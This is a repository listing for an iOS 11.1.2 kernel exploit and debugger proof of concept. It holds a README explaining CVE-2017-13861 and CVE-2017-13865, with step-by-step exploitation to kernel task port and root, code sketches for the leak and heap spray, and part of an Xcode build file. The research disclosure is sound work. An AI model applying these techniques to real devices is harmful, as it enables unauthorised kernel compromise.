├── .gitignore ├── README ├── async_wake_ios.xcodeproj └── project.pbxproj └── async_wake_ios ├── AppDelegate.h ├── AppDelegate.m ├── Assets.xcassets └── AppIcon.appiconset │ └── Contents.json ├── Base.lproj ├── LaunchScreen.storyboard └── Main.storyboard ├── Info.plist ├── ViewController.h ├── ViewController.m ├── arm64_state.h ├── async_wake.c ├── async_wake.h ├── com.apple.iokit.IOMobileGraphicsFamily.plist ├── early_kalloc.c ├── early_kalloc.h ├── find_port.c ├── find_port.h ├── kcall.c ├── kcall.h ├── kdbg.c ├── kdbg.h ├── kmem.c ├── kmem.h ├── kutils.c ├── kutils.h ├── main.m ├── symbols.c └── symbols.h /.gitignore: -------------------------------------------------------------------------------- 1 | # Created by https://www.gitignore.io/api/macos,xcode 2 | 3 | ### macOS ### 4 | *.DS_Store 5 | .AppleDouble 6 | .LSOverride 7 | 8 | # Icon must end with two \r 9 | Icon 10 | 11 | # Thumbnails 12 | ._* 13 | 14 | # Files that might appear in the root of a volume 15 | .DocumentRevisions-V100 16 | .fseventsd 17 | .Spotlight-V100 18 | .TemporaryItems 19 | .Trashes 20 | .VolumeIcon.icns 21 | .com.apple.timemachine.donotpresent 22 | 23 | # Directories potentially created on remote AFP share 24 | .AppleDB 25 | .AppleDesktop 26 | Network Trash Folder 27 | Temporary Items 28 | .apdisk 29 | 30 | ### Xcode ### 31 | # Xcode 32 | # 33 | # gitignore contributors: remember to update Global/Xcode.gitignore, Objective-C.gitignore & Swift.gitignore 34 | 35 | ## Build generated 36 | build/ 37 | DerivedData/ 38 | 39 | ## Various settings 40 | *.pbxuser 41 | !default.pbxuser 42 | *.mode1v3 43 | !default.mode1v3 44 | *.mode2v3 45 | !default.mode2v3 46 | *.perspectivev3 47 | !default.perspectivev3 48 | xcuserdata/ 49 | 50 | ## Other 51 | *.moved-aside 52 | *.xccheckout 53 | *.xcscmblueprint 54 | 55 | ### Xcode Patch ### 56 | *.xcodeproj/* 57 | !*.xcodeproj/project.pbxproj 58 | !*.xcodeproj/xcshareddata/ 59 | !*.xcworkspace/contents.xcworkspacedata 60 | /*.gcno 61 | 62 | # End of https://www.gitignore.io/api/macos,xcode 63 | 64 | async_wake_ios.xcodeproj/project.pbxproj 65 | async_wake_ios.xcodeproj/project.pbxproj 66 | -------------------------------------------------------------------------------- /README: -------------------------------------------------------------------------------- 1 | async_wake - iOS 11.1.2 kernel exploit and PoC local kernel debugger by @i41nbeer 2 | 3 | Supported Devices: 4 | tfp0: all 64-bit devices running 11.1.2 5 | 6 | tfp0 + local kernel debugger: iPhone 10, iPhone 7, iPhone 7 plus, iPhone 6S, iPhone 6 plus, iPod Touch 6G, iPad Mini 2 WiFi, iPhone 5S 7 | theoretically it will also work for all other devices, you just need to find the symbols 8 | 9 | root: all 64-bit devices running 11.1.2 10 | 11 | We can now temporarily gain uid=0! I think we have to swap back to the old uid to prevent kernel panics though. 12 | 13 | Usage: 14 | - call get_root() and store the cred (orig_cred) it returns. 15 | - do root stuff 16 | - unroot(orig_cred) 17 | 18 | PoC local kernel debugger: 19 | You can pause the execution of a syscall at arbitrary points and modify kernel state (registers and memory) then continue it. 20 | See kdbg.c for details and implementation. 
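The Usage steps above boil down to the following pattern. This is only a sketch: the exact get_root/unroot signatures are whatever the project headers declare, here assumed to pass the original cred around as an opaque value.

    // sketch only: assumes get_root() swaps our ucred for a root one and
    // returns the old cred, and unroot() swaps the old cred back in
    uint64_t orig_cred = get_root();
    // ... do root stuff here (getuid() should now return 0) ...
    unroot(orig_cred);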
21 | 22 | The bugs: 23 | 24 | === CVE-2017-13861 === 25 | [https://bugs.chromium.org/p/project-zero/issues/detail?id=1417] 26 | 27 | I have previously detailed the lifetime management paradigms in MIG in the writeups for: 28 | CVE-2016-7612 [https://bugs.chromium.org/p/project-zero/issues/detail?id=926] 29 | and 30 | CVE-2016-7633 [https://bugs.chromium.org/p/project-zero/issues/detail?id=954] 31 | 32 | If a MIG method returns KERN_SUCCESS it means that the method took ownership of *all* the arguments passed to it. 33 | If a MIG method returns an error code, then it took ownership of *none* of the arguments passed to it. 34 | 35 | If an IOKit userclient external method takes an async wake mach port argument then the lifetime of the reference 36 | on that mach port passed to the external method will be managed by MIG semantics. If the external method returns 37 | an error then MIG will assume that the reference was not consumed by the external method and as such the MIG 38 | generated code will drop a reference on the port. 39 | 40 | IOSurfaceRootUserClient external method 17 (s_set_surface_notify) will drop a reference on the wake_port 41 | (via IOUserClient::releaseAsyncReference64) then return an error code if the client has previously registered 42 | a port with the same callback function. 43 | 44 | The external method's error return value propagates via the return value of is_io_connect_async_method back to the 45 | MIG generated code which will drop a further reference on the wake_port when only one was taken. 46 | 47 | I also use another bug: 48 | 49 | === CVE-2017-13865 === 50 | [https://bugs.chromium.org/p/project-zero/issues/detail?id=1372] 51 | The kernel libproc API proc_list_uptrs has the following comment in its userspace header: 52 | 53 | /* 54 | * Enumerate potential userspace pointers embedded in kernel data structures. 55 | * Currently inspects kqueues only. 56 | * 57 | * NOTE: returned "pointers" are opaque user-supplied values and thus not 58 | * guaranteed to address valid objects or be pointers at all. 59 | * 60 | * Returns the number of pointers found (which may exceed buffersize), or -1 on 61 | * failure and errno set appropriately. 62 | */ 63 | 64 | This is a recent addition to the kernel, presumably as a debugging tool to help enumerate 65 | places where the kernel is accidentally disclosing pointers to userspace. 66 | 67 | The implementation currently enumerates kqueues and dumps a bunch of values from them.
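From userspace the API is reached via the libproc wrapper. A minimal sketch of a call that takes the unaligned-size path explained below (the prototype is assumed from the libproc.h header quoted above; treat it as an assumption):

    #include <stdio.h>
    #include <stdint.h>
    #include <stdlib.h>

    // assumed prototype of the libproc wrapper described above:
    int proc_list_uptrs(int pid, uint64_t* buffer, uint32_t buffersize);

    void leak_once(int pid) {
      uint32_t size = 15;                 // deliberately not a multiple of 8
      uint8_t* buf = calloc(1, size);
      // returns the number of "pointers" found, which may exceed what fits in buf;
      // with an unaligned size the kernel can copy back more bytes than it wrote
      int found = proc_list_uptrs(pid, (uint64_t*)buf, size);
      printf("found %d uptrs\n", found);
      free(buf);
    }

The kernel side follows.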
68 | 69 | Here's the relevant code: 70 | 71 | // buffer and buffersize are attacker controlled 72 | 73 | int 74 | proc_pidlistuptrs(proc_t p, user_addr_t buffer, uint32_t buffersize, int32_t *retval) 75 | { 76 | uint32_t count = 0; 77 | int error = 0; 78 | void *kbuf = NULL; 79 | int32_t nuptrs = 0; 80 | 81 | if (buffer != USER_ADDR_NULL) { 82 | count = buffersize / sizeof(uint64_t); <---(a) 83 | if (count > MAX_UPTRS) { 84 | count = MAX_UPTRS; 85 | buffersize = count * sizeof(uint64_t); 86 | } 87 | if (count > 0) { 88 | kbuf = kalloc(buffersize); <--- (b) 89 | assert(kbuf != NULL); 90 | } 91 | } else { 92 | buffersize = 0; 93 | } 94 | 95 | nuptrs = kevent_proc_copy_uptrs(p, kbuf, buffersize); 96 | 97 | if (kbuf) { 98 | size_t copysize; 99 | if (os_mul_overflow(nuptrs, sizeof(uint64_t), &copysize)) { <--- (c) 100 | error = ERANGE; 101 | goto out; 102 | } 103 | if (copysize > buffersize) { <-- (d) 104 | copysize = buffersize; 105 | } 106 | error = copyout(kbuf, buffer, copysize); <--- (e) 107 | } 108 | 109 | 110 | At (a) the attacker-supplied buffersize is divided by 8 to compute the maximum number of uint64_t's 111 | which can fit in there. 112 | 113 | If that value isn't huge then the attacker-supplied buffersize is used to kalloc the kbuf buffer at (b). 114 | 115 | kbuf and buffersize are then passed to kevent_proc_copy_uptrs. Looking at the implementation of 116 | kevent_proc_copy_uptrs the return value is the total number of values it found, even if that value is larger 117 | than the supplied buffer. If it finds more than will fit it keeps counting but no longer writes them to the kbuf. 118 | 119 | This means that at (c) the computed copysize value doesn't reflect how many values were actually written to kbuf 120 | but how many *could* have been written had the buffer been big enough. 121 | 122 | If more values could have been written than there was space for in the buffer then at (d) copysize 123 | will be limited down to buffersize. 124 | 125 | Copysize is then used at (e) to copy the contents of kbuf to userspace. 126 | 127 | The bug is that there's no enforcement that (buffersize % 8) == 0. If we were to pass a buffersize of 15, at (a) count would be 1 128 | as 15 bytes is only enough to store 1 complete uint64_t. At (b) this would kalloc a buffer of 15 bytes. 129 | 130 | If the target pid actually had 10 possible values which kevent_proc_copy_uptrs finds then nuptrs will return 10 but it will 131 | only write the first value to kbuf, leaving the last 7 bytes untouched. 132 | 133 | At (c) copysize will be computed at 10*8 = 80 bytes, at (d) since 80 > 15 copysize will be truncated back down to buffersize (15) 134 | and at (e) 15 bytes will be copied back to userspace even though only 8 were written to. 135 | 136 | 137 | Exploit technique: 138 | I use the proc_pidlistuptrs bug to disclose the address of arbitrary ipc_ports. This makes stuff a lot simpler :) 139 | To find a port address I fill a bunch of different-sized kalloc allocations with a pointer to the target port via mach messages using OOL_PORTS. 140 | 141 | I then trigger the OOB read bug for various kalloc sizes and look for the most commonly leaked kernel pointer. Given the 142 | semantics of kalloc this works well. 143 | 144 | I make a pretty large number of kalloc allocations (via sending mach messages) in a kalloc size bin I won't use later, and I keep hold of them for now. 145 | 146 | I allocate a bunch of mach ports to ensure that I have a page containing only my ports.
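(As an aside, the OOL_PORTS spray mentioned above boils down to sending a mach message whose body is a single out-of-line ports descriptor. A self-contained sketch of the general technique, not the project's exact code; the helper name is made up here:)

    #include <mach/mach.h>
    #include <stdlib.h>

    // send a message carrying an OOL ports descriptor to a port we own.
    // the kernel copies the descriptor contents into a kalloc buffer of
    // count * sizeof(void*) bytes, each entry a pointer to the target ipc_port,
    // and keeps that buffer alive for as long as the message stays queued.
    static kern_return_t spray_port_pointers(mach_port_t queue, mach_port_t target, uint32_t count) {
      typedef struct {
        mach_msg_header_t hdr;
        mach_msg_body_t body;
        mach_msg_ool_ports_descriptor_t ool;
      } ool_msg_t;

      mach_port_t* ports = calloc(count, sizeof(mach_port_t));
      for (uint32_t i = 0; i < count; i++) ports[i] = target;

      ool_msg_t msg = {0};
      msg.hdr.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0);
      msg.hdr.msgh_size = sizeof(msg);
      msg.hdr.msgh_remote_port = queue;   // a receive right we hold, so the kmsg stays queued
      msg.body.msgh_descriptor_count = 1;
      msg.ool.type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
      msg.ool.address = ports;
      msg.ool.count = count;
      msg.ool.copy = MACH_MSG_PHYSICAL_COPY;
      msg.ool.disposition = MACH_MSG_TYPE_MAKE_SEND;
      msg.ool.deallocate = FALSE;

      kern_return_t kr = mach_msg(&msg.hdr, MACH_SEND_MSG, sizeof(msg), 0,
                                  MACH_PORT_NULL, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
      free(ports);
      return kr;
    }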
I use the port address disclosure to find 147 | a port which fits within particular bounds on a page. Once I've found it, I use the IOSurface bug to give myself a dangling pointer to that port. 148 | 149 | I free the kalloc allocations made earlier and all the other ports, then start making kalloc.4096 allocations (again via crafted mach messages). 150 | 151 | I do the reallocation slowly, 1MB at a time, so that a kernel zone garbage collection will trigger and collect the page that the dangling pointer points to. 152 | 153 | The GC will trigger when the zone map is over 95% full. It's easy to do that; the trick is to make sure there's plenty of stuff which the GC can collect 154 | so that you don't get immediately killed by jetsam. All devices have the same sized zone map (384MB). 155 | 156 | The replacement kalloc.4096 allocations are ipc_kmsg buffers which contain a fake IKOT_TASK port pointing to a fake struct task. 157 | I use the bsdinfo->pid trick to build an arbitrary read with this (see details in async_wake.c). 158 | 159 | With the arbitrary read I find the kernel task's vm_map and the kernel ipc_space. I then free and reallocate the kalloc.4096 buffer, replacing it with a fake 160 | kernel task port. 161 | 162 | Limitations: 163 | The technique should work reliably enough for a security research tool. For me it works about 9/10 times. If you run it multiple times without rebooting, 164 | it will probably panic; the GC forcing and reallocating trick isn't particularly advanced. 165 | 166 | It's more likely to work after a fresh reboot. 167 | 168 | The tfp0 returned by get_kernel_memory_rw should be safe to keep using after the exploit process has exited, but I haven't tested that. 169 | 170 | Porting to other devices: 171 | 172 | Getting tfp0 should work for all devices running 11.1.2; it only requires structure offsets, not kernel symbols, and those offsets are unlikely to change between devices. 173 | To port the PoC kernel debugger you need to find the correct symbols and update symbols.c; hints are given there. 174 | 175 | For further discussion of this bug and other exploit techniques see: 176 | http://blog.pangu.io/iosurfacerootuserclient-port-uaf/ 177 | https://siguza.github.io/v0rtex/ 178 | -------------------------------------------------------------------------------- /async_wake_ios.xcodeproj/project.pbxproj: -------------------------------------------------------------------------------- 1 | // !$*UTF8*$!
2 | { 3 | archiveVersion = 1; 4 | classes = { 5 | }; 6 | objectVersion = 48; 7 | objects = { 8 | 9 | /* Begin PBXBuildFile section */ 10 | 53F39D541FE1F28C00CD8539 /* com.apple.iokit.IOMobileGraphicsFamily.plist in Resources */ = {isa = PBXBuildFile; fileRef = 53F39D531FE1F28B00CD8539 /* com.apple.iokit.IOMobileGraphicsFamily.plist */; }; 11 | B003EB351FC583CB00C58441 /* kmem.c in Sources */ = {isa = PBXBuildFile; fileRef = B003EB331FC583CA00C58441 /* kmem.c */; }; 12 | B003EB381FC5863800C58441 /* find_port.c in Sources */ = {isa = PBXBuildFile; fileRef = B003EB361FC5863800C58441 /* find_port.c */; }; 13 | B003EB3B1FC58F4900C58441 /* kdbg.c in Sources */ = {isa = PBXBuildFile; fileRef = B003EB391FC58F4900C58441 /* kdbg.c */; }; 14 | B04E25091FCD6DB300F09CCE /* kutils.c in Sources */ = {isa = PBXBuildFile; fileRef = B04E25071FCD6DB300F09CCE /* kutils.c */; }; 15 | B07A023E1FB09B6F0018ACE5 /* AppDelegate.m in Sources */ = {isa = PBXBuildFile; fileRef = B07A023D1FB09B6F0018ACE5 /* AppDelegate.m */; }; 16 | B07A02411FB09B6F0018ACE5 /* ViewController.m in Sources */ = {isa = PBXBuildFile; fileRef = B07A02401FB09B6F0018ACE5 /* ViewController.m */; }; 17 | B07A02441FB09B6F0018ACE5 /* Main.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = B07A02421FB09B6F0018ACE5 /* Main.storyboard */; }; 18 | B07A02461FB09B6F0018ACE5 /* Assets.xcassets in Resources */ = {isa = PBXBuildFile; fileRef = B07A02451FB09B6F0018ACE5 /* Assets.xcassets */; }; 19 | B07A02491FB09B6F0018ACE5 /* LaunchScreen.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = B07A02471FB09B6F0018ACE5 /* LaunchScreen.storyboard */; }; 20 | B07A024C1FB09B6F0018ACE5 /* main.m in Sources */ = {isa = PBXBuildFile; fileRef = B07A024B1FB09B6F0018ACE5 /* main.m */; }; 21 | B07A02541FB09C3D0018ACE5 /* async_wake.c in Sources */ = {isa = PBXBuildFile; fileRef = B07A02521FB09C3D0018ACE5 /* async_wake.c */; }; 22 | B0EF11141FCC6F9C00C1D14E /* kcall.c in Sources */ = {isa = PBXBuildFile; fileRef = B0EF11121FCC6F9C00C1D14E /* kcall.c */; }; 23 | B0EF11171FCC784B00C1D14E /* symbols.c in Sources */ = {isa = PBXBuildFile; fileRef = B0EF11151FCC784B00C1D14E /* symbols.c */; }; 24 | B0F5AA3F1FDE87E90073FD88 /* early_kalloc.c in Sources */ = {isa = PBXBuildFile; fileRef = B0F5AA3D1FDE87E80073FD88 /* early_kalloc.c */; }; 25 | /* End PBXBuildFile section */ 26 | 27 | /* Begin PBXFileReference section */ 28 | 53F39D531FE1F28B00CD8539 /* com.apple.iokit.IOMobileGraphicsFamily.plist */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = text.plist.xml; path = com.apple.iokit.IOMobileGraphicsFamily.plist; sourceTree = ""; }; 29 | B003EB331FC583CA00C58441 /* kmem.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = kmem.c; sourceTree = ""; }; 30 | B003EB341FC583CA00C58441 /* kmem.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = kmem.h; sourceTree = ""; }; 31 | B003EB361FC5863800C58441 /* find_port.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = find_port.c; sourceTree = ""; }; 32 | B003EB371FC5863800C58441 /* find_port.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = find_port.h; sourceTree = ""; }; 33 | B003EB391FC58F4900C58441 /* kdbg.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = kdbg.c; sourceTree = ""; }; 34 | B003EB3A1FC58F4900C58441 /* kdbg.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = kdbg.h; sourceTree = ""; }; 35 | B04E25071FCD6DB300F09CCE /* kutils.c */ = {isa = 
PBXFileReference; lastKnownFileType = sourcecode.c.c; path = kutils.c; sourceTree = ""; }; 36 | B04E25081FCD6DB300F09CCE /* kutils.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = kutils.h; sourceTree = ""; }; 37 | B04E250A1FCF083A00F09CCE /* arm64_state.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = arm64_state.h; sourceTree = ""; }; 38 | B07A02391FB09B6F0018ACE5 /* async_wake_ios.app */ = {isa = PBXFileReference; explicitFileType = wrapper.application; includeInIndex = 0; path = async_wake_ios.app; sourceTree = BUILT_PRODUCTS_DIR; }; 39 | B07A023C1FB09B6F0018ACE5 /* AppDelegate.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = AppDelegate.h; sourceTree = ""; }; 40 | B07A023D1FB09B6F0018ACE5 /* AppDelegate.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = AppDelegate.m; sourceTree = ""; }; 41 | B07A023F1FB09B6F0018ACE5 /* ViewController.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = ViewController.h; sourceTree = ""; }; 42 | B07A02401FB09B6F0018ACE5 /* ViewController.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = ViewController.m; sourceTree = ""; }; 43 | B07A02431FB09B6F0018ACE5 /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/Main.storyboard; sourceTree = ""; }; 44 | B07A02451FB09B6F0018ACE5 /* Assets.xcassets */ = {isa = PBXFileReference; lastKnownFileType = folder.assetcatalog; path = Assets.xcassets; sourceTree = ""; }; 45 | B07A02481FB09B6F0018ACE5 /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/LaunchScreen.storyboard; sourceTree = ""; }; 46 | B07A024A1FB09B6F0018ACE5 /* Info.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist.xml; path = Info.plist; sourceTree = ""; }; 47 | B07A024B1FB09B6F0018ACE5 /* main.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = main.m; sourceTree = ""; }; 48 | B07A02521FB09C3D0018ACE5 /* async_wake.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = async_wake.c; sourceTree = ""; }; 49 | B07A02531FB09C3D0018ACE5 /* async_wake.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = async_wake.h; sourceTree = ""; }; 50 | B0EF11121FCC6F9C00C1D14E /* kcall.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = kcall.c; sourceTree = ""; }; 51 | B0EF11131FCC6F9C00C1D14E /* kcall.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = kcall.h; sourceTree = ""; }; 52 | B0EF11151FCC784B00C1D14E /* symbols.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = symbols.c; sourceTree = ""; }; 53 | B0EF11161FCC784B00C1D14E /* symbols.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = symbols.h; sourceTree = ""; }; 54 | B0F5AA3D1FDE87E80073FD88 /* early_kalloc.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = early_kalloc.c; sourceTree = ""; }; 55 | B0F5AA3E1FDE87E80073FD88 /* early_kalloc.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = early_kalloc.h; sourceTree = ""; }; 56 | /* End PBXFileReference section */ 57 | 58 | /* Begin PBXFrameworksBuildPhase section */ 59 | B07A02361FB09B6F0018ACE5 /* Frameworks */ = { 60 | isa = PBXFrameworksBuildPhase; 61 | buildActionMask = 2147483647; 62 | files = ( 63 | ); 64 | runOnlyForDeploymentPostprocessing = 0; 65 | }; 66 | /* End 
PBXFrameworksBuildPhase section */ 67 | 68 | /* Begin PBXGroup section */ 69 | B07A02301FB09B6F0018ACE5 = { 70 | isa = PBXGroup; 71 | children = ( 72 | B07A023B1FB09B6F0018ACE5 /* async_wake_ios */, 73 | B07A023A1FB09B6F0018ACE5 /* Products */, 74 | ); 75 | sourceTree = ""; 76 | }; 77 | B07A023A1FB09B6F0018ACE5 /* Products */ = { 78 | isa = PBXGroup; 79 | children = ( 80 | B07A02391FB09B6F0018ACE5 /* async_wake_ios.app */, 81 | ); 82 | name = Products; 83 | sourceTree = ""; 84 | }; 85 | B07A023B1FB09B6F0018ACE5 /* async_wake_ios */ = { 86 | isa = PBXGroup; 87 | children = ( 88 | 53F39D531FE1F28B00CD8539 /* com.apple.iokit.IOMobileGraphicsFamily.plist */, 89 | B07A023C1FB09B6F0018ACE5 /* AppDelegate.h */, 90 | B07A023D1FB09B6F0018ACE5 /* AppDelegate.m */, 91 | B07A023F1FB09B6F0018ACE5 /* ViewController.h */, 92 | B07A02401FB09B6F0018ACE5 /* ViewController.m */, 93 | B07A02421FB09B6F0018ACE5 /* Main.storyboard */, 94 | B07A02451FB09B6F0018ACE5 /* Assets.xcassets */, 95 | B07A02471FB09B6F0018ACE5 /* LaunchScreen.storyboard */, 96 | B07A024A1FB09B6F0018ACE5 /* Info.plist */, 97 | B07A024B1FB09B6F0018ACE5 /* main.m */, 98 | B07A02521FB09C3D0018ACE5 /* async_wake.c */, 99 | B07A02531FB09C3D0018ACE5 /* async_wake.h */, 100 | B003EB331FC583CA00C58441 /* kmem.c */, 101 | B003EB341FC583CA00C58441 /* kmem.h */, 102 | B04E250A1FCF083A00F09CCE /* arm64_state.h */, 103 | B003EB361FC5863800C58441 /* find_port.c */, 104 | B003EB371FC5863800C58441 /* find_port.h */, 105 | B003EB391FC58F4900C58441 /* kdbg.c */, 106 | B003EB3A1FC58F4900C58441 /* kdbg.h */, 107 | B0EF11151FCC784B00C1D14E /* symbols.c */, 108 | B0EF11161FCC784B00C1D14E /* symbols.h */, 109 | B0EF11121FCC6F9C00C1D14E /* kcall.c */, 110 | B0EF11131FCC6F9C00C1D14E /* kcall.h */, 111 | B04E25071FCD6DB300F09CCE /* kutils.c */, 112 | B04E25081FCD6DB300F09CCE /* kutils.h */, 113 | B0F5AA3D1FDE87E80073FD88 /* early_kalloc.c */, 114 | B0F5AA3E1FDE87E80073FD88 /* early_kalloc.h */, 115 | ); 116 | path = async_wake_ios; 117 | sourceTree = ""; 118 | }; 119 | /* End PBXGroup section */ 120 | 121 | /* Begin PBXNativeTarget section */ 122 | B07A02381FB09B6F0018ACE5 /* async_wake_ios */ = { 123 | isa = PBXNativeTarget; 124 | buildConfigurationList = B07A024F1FB09B6F0018ACE5 /* Build configuration list for PBXNativeTarget "async_wake_ios" */; 125 | buildPhases = ( 126 | B07A02351FB09B6F0018ACE5 /* Sources */, 127 | B07A02361FB09B6F0018ACE5 /* Frameworks */, 128 | B07A02371FB09B6F0018ACE5 /* Resources */, 129 | ); 130 | buildRules = ( 131 | ); 132 | dependencies = ( 133 | ); 134 | name = async_wake_ios; 135 | productName = async_wake_ios; 136 | productReference = B07A02391FB09B6F0018ACE5 /* async_wake_ios.app */; 137 | productType = "com.apple.product-type.application"; 138 | }; 139 | /* End PBXNativeTarget section */ 140 | 141 | /* Begin PBXProject section */ 142 | B07A02311FB09B6F0018ACE5 /* Project object */ = { 143 | isa = PBXProject; 144 | attributes = { 145 | LastUpgradeCheck = 0910; 146 | ORGANIZATIONNAME = "Ian Beer"; 147 | TargetAttributes = { 148 | B07A02381FB09B6F0018ACE5 = { 149 | CreatedOnToolsVersion = 9.1; 150 | ProvisioningStyle = Automatic; 151 | }; 152 | }; 153 | }; 154 | buildConfigurationList = B07A02341FB09B6F0018ACE5 /* Build configuration list for PBXProject "async_wake_ios" */; 155 | compatibilityVersion = "Xcode 8.0"; 156 | developmentRegion = en; 157 | hasScannedForEncodings = 0; 158 | knownRegions = ( 159 | en, 160 | Base, 161 | ); 162 | mainGroup = B07A02301FB09B6F0018ACE5; 163 | productRefGroup = B07A023A1FB09B6F0018ACE5 /* Products 
*/; 164 | projectDirPath = ""; 165 | projectRoot = ""; 166 | targets = ( 167 | B07A02381FB09B6F0018ACE5 /* async_wake_ios */, 168 | ); 169 | }; 170 | /* End PBXProject section */ 171 | 172 | /* Begin PBXResourcesBuildPhase section */ 173 | B07A02371FB09B6F0018ACE5 /* Resources */ = { 174 | isa = PBXResourcesBuildPhase; 175 | buildActionMask = 2147483647; 176 | files = ( 177 | B07A02491FB09B6F0018ACE5 /* LaunchScreen.storyboard in Resources */, 178 | B07A02461FB09B6F0018ACE5 /* Assets.xcassets in Resources */, 179 | B07A02441FB09B6F0018ACE5 /* Main.storyboard in Resources */, 180 | 53F39D541FE1F28C00CD8539 /* com.apple.iokit.IOMobileGraphicsFamily.plist in Resources */, 181 | ); 182 | runOnlyForDeploymentPostprocessing = 0; 183 | }; 184 | /* End PBXResourcesBuildPhase section */ 185 | 186 | /* Begin PBXSourcesBuildPhase section */ 187 | B07A02351FB09B6F0018ACE5 /* Sources */ = { 188 | isa = PBXSourcesBuildPhase; 189 | buildActionMask = 2147483647; 190 | files = ( 191 | B003EB351FC583CB00C58441 /* kmem.c in Sources */, 192 | B0EF11171FCC784B00C1D14E /* symbols.c in Sources */, 193 | B07A02411FB09B6F0018ACE5 /* ViewController.m in Sources */, 194 | B04E25091FCD6DB300F09CCE /* kutils.c in Sources */, 195 | B07A024C1FB09B6F0018ACE5 /* main.m in Sources */, 196 | B003EB381FC5863800C58441 /* find_port.c in Sources */, 197 | B07A02541FB09C3D0018ACE5 /* async_wake.c in Sources */, 198 | B07A023E1FB09B6F0018ACE5 /* AppDelegate.m in Sources */, 199 | B003EB3B1FC58F4900C58441 /* kdbg.c in Sources */, 200 | B0EF11141FCC6F9C00C1D14E /* kcall.c in Sources */, 201 | B0F5AA3F1FDE87E90073FD88 /* early_kalloc.c in Sources */, 202 | ); 203 | runOnlyForDeploymentPostprocessing = 0; 204 | }; 205 | /* End PBXSourcesBuildPhase section */ 206 | 207 | /* Begin PBXVariantGroup section */ 208 | B07A02421FB09B6F0018ACE5 /* Main.storyboard */ = { 209 | isa = PBXVariantGroup; 210 | children = ( 211 | B07A02431FB09B6F0018ACE5 /* Base */, 212 | ); 213 | name = Main.storyboard; 214 | sourceTree = ""; 215 | }; 216 | B07A02471FB09B6F0018ACE5 /* LaunchScreen.storyboard */ = { 217 | isa = PBXVariantGroup; 218 | children = ( 219 | B07A02481FB09B6F0018ACE5 /* Base */, 220 | ); 221 | name = LaunchScreen.storyboard; 222 | sourceTree = ""; 223 | }; 224 | /* End PBXVariantGroup section */ 225 | 226 | /* Begin XCBuildConfiguration section */ 227 | B07A024D1FB09B6F0018ACE5 /* Debug */ = { 228 | isa = XCBuildConfiguration; 229 | buildSettings = { 230 | ALWAYS_SEARCH_USER_PATHS = NO; 231 | CLANG_ANALYZER_NONNULL = YES; 232 | CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE; 233 | CLANG_CXX_LANGUAGE_STANDARD = "gnu++14"; 234 | CLANG_CXX_LIBRARY = "libc++"; 235 | CLANG_ENABLE_MODULES = YES; 236 | CLANG_ENABLE_OBJC_ARC = YES; 237 | CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES; 238 | CLANG_WARN_BOOL_CONVERSION = YES; 239 | CLANG_WARN_COMMA = YES; 240 | CLANG_WARN_CONSTANT_CONVERSION = YES; 241 | CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR; 242 | CLANG_WARN_DOCUMENTATION_COMMENTS = YES; 243 | CLANG_WARN_EMPTY_BODY = YES; 244 | CLANG_WARN_ENUM_CONVERSION = YES; 245 | CLANG_WARN_INFINITE_RECURSION = YES; 246 | CLANG_WARN_INT_CONVERSION = YES; 247 | CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES; 248 | CLANG_WARN_OBJC_LITERAL_CONVERSION = YES; 249 | CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR; 250 | CLANG_WARN_RANGE_LOOP_ANALYSIS = YES; 251 | CLANG_WARN_STRICT_PROTOTYPES = YES; 252 | CLANG_WARN_SUSPICIOUS_MOVE = YES; 253 | CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE; 254 | CLANG_WARN_UNREACHABLE_CODE = YES; 255 | 
